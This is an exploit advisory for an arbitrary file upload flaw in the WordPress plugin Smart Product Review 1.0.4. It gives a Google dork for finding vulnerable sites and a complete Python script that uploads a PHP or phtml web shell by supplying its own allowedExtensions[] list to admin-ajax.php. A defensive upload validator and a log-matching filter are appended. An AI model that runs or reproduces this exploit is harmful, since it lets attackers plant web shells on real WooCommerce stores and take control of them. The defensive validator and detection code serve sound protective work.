
Smart Product Review 1.0.4 Arbitrary File Upload on WordPress


Smart Product Review is an all-in-one review pack for your WooCommerce store. It lets you add customer reviews and ratings with images and videos, with AJAX review submission and pagination. Three layouts (Grid, List, and Slider) are available in the plugin.

Exploit Title: WordPress Plugin Smart Product Review 1.0.4 – Arbitrary File Upload
Google Dork: inurl: /wp-content/plugins/smart-product-review/
Date: 16/11/2021
Exploit Author: Keyvan Hardani
Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
Version: <= 1.0.4
Tested on: Kali Linux

from os import path
import requests
import time
import sys


def banner():
    # Short spinner, then the tool header.
    animation = "|/-\\"
    for i in range(20):
        time.sleep(0.1)
        sys.stdout.write("\r" + animation[i % len(animation)])
        sys.stdout.flush()
    print("Smart Product Review 1.0.4 - Arbitrary File Upload")
    print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")


def usage():
    print("Usage: python3 exploit.py [target url] [your shell]")
    print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")


def vuln_check(uri):
    # The plugin's ajax handler answers with this string when it refuses the request.
    response = requests.get(uri)
    raw = response.text
    if "No script kiddies please!!" in raw:
        return False
    return True


def main():
    banner()
    if len(sys.argv) != 3:
        usage()
        sys.exit(1)
    base = sys.argv[1]
    file_path = sys.argv[2]
    ajax_action = 'sprw_file_upload_action'
    admin = '/wp-admin/admin-ajax.php'
    uri = base + admin + '?action=' + ajax_action
    check = vuln_check(uri)
    if not check:
        print("() Target not vulnerable!")
        sys.exit(1)
    if not path.isfile(file_path):
        print("() Invalid file!")
        sys.exit(1)
    # Open in binary mode so arbitrary file bytes are sent unchanged.
    files = {'files[]': open(file_path, 'rb')}
    # The allowedExtensions[] list is supplied by the client and honoured
    # by the handler, which is the root cause of the issue.
    data = {
        "allowedExtensions[0]": "jpg",
        "allowedExtensions[1]": "php4",
        "allowedExtensions[2]": "phtml",
        "allowedExtensions[3]": "png",
        "qqfile": "files",
        "element_id": "6837",
        "sizeLimit": "12000000",
        "file_uploader_nonce": "2b102311b7"
    }
    print("Uploading Shell...")
    response = requests.post(uri, files=files, data=data)
    file_name = path.basename(file_path)
    if "ok" in response.text:
        print("Shell Uploaded!")
        print("Shell URL on your Review/Comment")
    else:
        print("Shell Upload Failed")
        sys.exit(1)


main()

This issue may since have been fixed by the developer.
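The root cause above is that the upload handler trusts the client-supplied allowedExtensions[] array. The following is an added defensive example (not the plugin's code and not part of the original exploit) showing the server-side check such a handler needs: a fixed extension allowlist, a magic-byte check, and a simple filter for access-log lines that hit the vulnerable ajax action. The magic-byte table and the sample log lines are constructed for illustration.

```python
import os
from typing import Dict, List, Optional

# Server-side allowlist: extension -> accepted magic-byte prefixes (constructed).
SAFE_TYPES: Dict[str, List[bytes]] = {
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "png": [b"\x89PNG\r\n\x1a\n"],
    "gif": [b"GIF87a", b"GIF89a"],
}


def validate_upload(filename: str, content: bytes,
                    client_allowed: Optional[List[str]] = None) -> Dict[str, object]:
    """Return {'accept': bool, 'reason': str} for one uploaded file.

    client_allowed stands for the posted allowedExtensions[] list. It is taken
    as a parameter only to make the point explicit: it must never influence
    the decision, so the function does not read it.
    """
    base = os.path.basename(filename)
    # Only accept plain "name.ext"; this also rejects double extensions
    # such as "shell.php.jpg" that some servers map to PHP.
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return {"accept": False, "reason": "unexpected file name shape"}
    ext = parts[1]
    if ext not in SAFE_TYPES:
        return {"accept": False, "reason": f"extension .{ext} not in server allowlist"}
    # Magic bytes catch renamed scripts; they do not catch image/PHP polyglots,
    # so the upload directory must also be served without script execution.
    if not any(content.startswith(m) for m in SAFE_TYPES[ext]):
        return {"accept": False, "reason": "content does not match claimed type"}
    return {"accept": True, "reason": "ok"}


def is_upload_action(log_line: str) -> bool:
    """Flag combined-format access-log entries POSTing to the plugin's ajax action."""
    return ('"POST ' in log_line and "admin-ajax.php" in log_line
            and "action=sprw_file_upload_action" in log_line)


# Constructed sample log lines: one hit on the vulnerable action, one unrelated.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Nov/2021:10:00:00 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=sprw_file_upload_action HTTP/1.1" 200 512 "-" "python-requests/2.26"',
    '198.51.100.7 - - [16/Nov/2021:10:00:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]
```

Run the validator against the same parameters the exploit sends (a .phtml file with php4/phtml in allowedExtensions[]) and it rejects the upload regardless of the client list.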
